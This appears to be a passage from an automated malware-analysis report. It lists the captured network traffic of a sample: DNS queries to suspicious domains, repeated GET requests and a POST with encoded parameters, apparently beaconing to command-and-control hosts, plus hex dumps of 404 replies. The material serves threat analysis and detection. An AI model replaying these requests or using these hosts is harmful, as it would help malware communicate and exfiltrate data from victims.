            Source: global trafficHTTP traffic detected: GET /p6o9/?TJY8=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&3L7=cfJLLBshpRPDzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.qiluqiyuan.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /45sz/?3L7=cfJLLBshpRPDzp&TJY8=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.omexai.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.clientebradesco.online
            Source: global trafficDNS traffic detected: DNS query: www.myim.cloud
            Source: global trafficDNS traffic detected: DNS query: www.d55dg.top
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.fineg.online
            Source: global trafficDNS traffic detected: DNS query: www.asian-massage-us.xyz
            Source: global trafficDNS traffic detected: DNS query: www.thriveline.online
            Source: global trafficDNS traffic detected: DNS query: www.aflaksokna.com
            Source: global trafficDNS traffic detected: DNS query: www.esistiliya.online
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.dfbio.net
            Source: unknownHTTP traffic detected: POST /12ts/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 201Host: www.myim.cloudOrigin: http://www.myim.cloudReferer: http://www.myim.cloud/12ts/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36Data Raw: 54 4a 59 38 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d Data Ascii: TJY8=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:46:33 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:46:35 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:46:38 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:46:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:46:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 10:47:00 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 10:47:03 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 10:47:05 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 10:47:08 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:48:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 